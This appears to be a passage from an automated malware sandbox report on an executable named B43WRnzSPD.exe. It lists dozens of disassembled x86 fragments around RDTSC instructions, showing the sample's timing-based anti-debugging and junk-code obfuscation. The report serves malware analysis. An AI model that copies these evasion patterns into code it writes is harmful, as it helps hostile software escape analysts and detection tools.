Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDF68C second address: EDF690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE3B44 second address: EE3B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007F262D38FB16h 0x0000000a nop 0x0000000b cmc 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F262D38FB08h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 push ecx 0x00000029 mov bl, 45h 0x0000002b pop ebx 0x0000002c push 00000000h 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 jnc 00007F262D38FB06h 0x00000038 jnc 00007F262D38FB06h 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE4AF8 second address: EE4AFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE7C3B second address: EE7C41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE7C41 second address: EE7C87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F262CBE4E8Ch 0x0000000f nop 0x00000010 or edi, 54CEAF79h 0x00000016 push 00000000h 0x00000018 add dword ptr [ebp+12A02ED5h], edi 0x0000001e push 00000000h 0x00000020 pushad 0x00000021 or ebx, dword ptr [ebp+12A0346Bh] 0x00000027 mov dh, 25h 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE4CFD second address: EE4D93 instructions: 0x00000000 rdtsc 0x00000002 je 00007F262D38FB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F262D38FB08h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 or dword ptr [ebp+12A0345Ah], eax 0x0000002e push dword ptr fs:[00000000h] 0x00000035 movzx edi, dx 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f jmp 00007F262D38FB11h 0x00000044 mov eax, dword ptr [ebp+12A00599h] 0x0000004a push 00000000h 0x0000004c push ebx 0x0000004d call 00007F262D38FB08h 0x00000052 pop ebx 0x00000053 mov dword ptr [esp+04h], ebx 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc ebx 0x00000060 push ebx 0x00000061 ret 0x00000062 pop ebx 0x00000063 ret 0x00000064 mov ebx, dword ptr [ebp+12A01941h] 0x0000006a push FFFFFFFFh 0x0000006c add di, 2334h 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 jng 00007F262D38FB06h 0x0000007c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE3CC0 second address: EE3D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, eax 0x0000000b push dword ptr fs:[00000000h] 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F262CBE4E88h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c and ebx, dword ptr [ebp+12A0200Ah] 0x00000032 pushad 0x00000033 mov dword ptr [ebp+12A0B8F1h], edx 0x00000039 or al, FFFFFFF2h 0x0000003c popad 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 mov eax, dword ptr [ebp+12A00841h] 0x0000004a clc 0x0000004b and ebx, dword ptr [ebp+12A01BFCh] 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push esi 0x00000056 call 00007F262CBE4E88h 0x0000005b pop esi 0x0000005c mov dword ptr [esp+04h], esi 0x00000060 add dword ptr [esp+04h], 00000019h 0x00000068 inc esi 0x00000069 push esi 0x0000006a ret 0x0000006b pop esi 0x0000006c ret 0x0000006d mov ebx, 506DEAD1h 0x00000072 mov edi, dword ptr [ebp+12A02D91h] 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007F262CBE4E95h 0x00000080 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE7C87 second address: EE7C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE4D93 second address: EE4D9D instructions: 0x00000000 rdtsc 0x00000002 je 00007F262CBE4E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE7C8B second address: EE7C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EEA2B0 second address: EEA2C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EEA2C4 second address: EEA2C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE7E0C second address: EE7E1E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F262CBE4E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F262CBE4E86h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EEA51E second address: EEA524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EEC405 second address: EEC40A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EEE230 second address: EEE2CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F262D38FB0Bh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F262D38FB19h 0x00000017 pop edx 0x00000018 nop 0x00000019 mov dword ptr [ebp+12A02DAAh], edi 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007F262D38FB08h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 00000019h 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b mov edi, dword ptr [ebp+12A02C0Eh] 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push edx 0x00000046 call 00007F262D38FB08h 0x0000004b pop edx 0x0000004c mov dword ptr [esp+04h], edx 0x00000050 add dword ptr [esp+04h], 0000001Ah 0x00000058 inc edx 0x00000059 push edx 0x0000005a ret 0x0000005b pop edx 0x0000005c ret 0x0000005d mov bx, 2929h 0x00000061 xchg eax, esi 0x00000062 js 00007F262D38FB0Eh 0x00000068 push edi 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EEE2CF second address: EEE2DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push esi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF0196 second address: EF019A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EEE504 second address: EEE509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EED4C6 second address: EED4CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF019A second address: EF019F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EED4CA second address: EED561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F262D38FB08h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 push dword ptr fs:[00000000h] 0x0000002b cld 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 mov dword ptr [ebp+12A01C07h], eax 0x00000039 mov eax, dword ptr [ebp+12A0172Dh] 0x0000003f push ebx 0x00000040 pop ebx 0x00000041 push FFFFFFFFh 0x00000043 push 00000000h 0x00000045 push edi 0x00000046 call 00007F262D38FB08h 0x0000004b pop edi 0x0000004c mov dword ptr [esp+04h], edi 0x00000050 add dword ptr [esp+04h], 0000001Bh 0x00000058 inc edi 0x00000059 push edi 0x0000005a ret 0x0000005b pop edi 0x0000005c ret 0x0000005d cld 0x0000005e sub bl, 00000020h 0x00000061 push eax 0x00000062 pushad 0x00000063 pushad 0x00000064 jmp 00007F262D38FB18h 0x00000069 push ebx 0x0000006a pop ebx 0x0000006b popad 0x0000006c push eax 0x0000006d push edx 0x0000006e jl 00007F262D38FB06h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF019F second address: EF021C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F262CBE4E86h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e sub bh, FFFFFFEBh 0x00000011 mov di, 9DA1h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F262CBE4E88h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov dword ptr [ebp+12A01C75h], edi 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F262CBE4E88h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 push esi 0x00000054 mov ebx, dword ptr [ebp+12A01AD1h] 0x0000005a pop edi 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F262CBE4E92h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF021C second address: EF0221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF0221 second address: EF022F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF126C second address: EF12B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push eax 0x00000009 mov di, EBC2h 0x0000000d pop edi 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+12A028E6h], ecx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F262D38FB08h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 sub dword ptr [ebp+12A0216Eh], ecx 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF0340 second address: EF0345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF12B5 second address: EF12BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF0411 second address: EF0416 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF20EF second address: EF20F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF31E2 second address: EF31E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF22EA second address: EF22EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF22EE second address: EF22F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF3327 second address: EF332D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EF332D second address: EF3346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c je 00007F262CBE4E88h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: E9F19E second address: E9F1A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: E9F1A3 second address: E9F1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: E9F1A9 second address: E9F1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EFF23E second address: EFF260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F262CBE4E98h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EFF260 second address: EFF266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: E9000D second address: E90011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: E90011 second address: E90015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EFEB20 second address: EFEB3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F262CBE4E99h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EFEB3F second address: EFEB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F262D38FB17h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EFEE57 second address: EFEE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EFEE5C second address: EFEE78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F262D38FB06h 0x0000000a jmp 00007F262D38FB12h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F04DAA second address: F04DAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F04EEA second address: F04F03 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F262D38FB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F262D38FB08h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F04F03 second address: F04F0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F262CBE4E86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F04FD3 second address: F05008 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F262D38FB1Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F05008 second address: F05019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F262CBE4E8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F0965E second address: F09668 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F262D38FB1Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F0992A second address: F0993D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E8Ch 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F09A8A second address: F09A97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F09A97 second address: F09AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F262CBE4E92h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F09D83 second address: F09D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F09D8D second address: F09D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F09D91 second address: F09D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F09D97 second address: F09DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F0F212 second address: F0F22C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F262D38FB08h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F262D38FB06h 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F0F22C second address: F0F234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F0F3CB second address: F0F3D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007F262D38FB06h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EC422F second address: EC423D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F262CBE4E86h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EC423D second address: EC4245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EC4245 second address: EC4250 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F262CBE4E86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: E9A1A6 second address: E9A1C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F262D38FB11h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: E9A1C4 second address: E9A1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F262CBE4E8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: E9A1D4 second address: E9A1D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F13233 second address: F13249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F262CBE4E8Fh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE1ABF second address: EE1AD6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnc 00007F262D38FB06h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F262D38FB06h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE1AD6 second address: EE1AE0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F262CBE4E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE1AE0 second address: EE1B7B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F262D38FB14h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F262D38FB08h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov dword ptr [ebp+12A02061h], esi 0x0000002c lea eax, dword ptr [ebp+12BB5833h] 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F262D38FB08h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000018h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c movsx ecx, dx 0x0000004f push ecx 0x00000050 xor dword ptr [ebp+12A0194Eh], eax 0x00000056 pop edx 0x00000057 nop 0x00000058 jbe 00007F262D38FB1Fh 0x0000005e jmp 00007F262D38FB19h 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
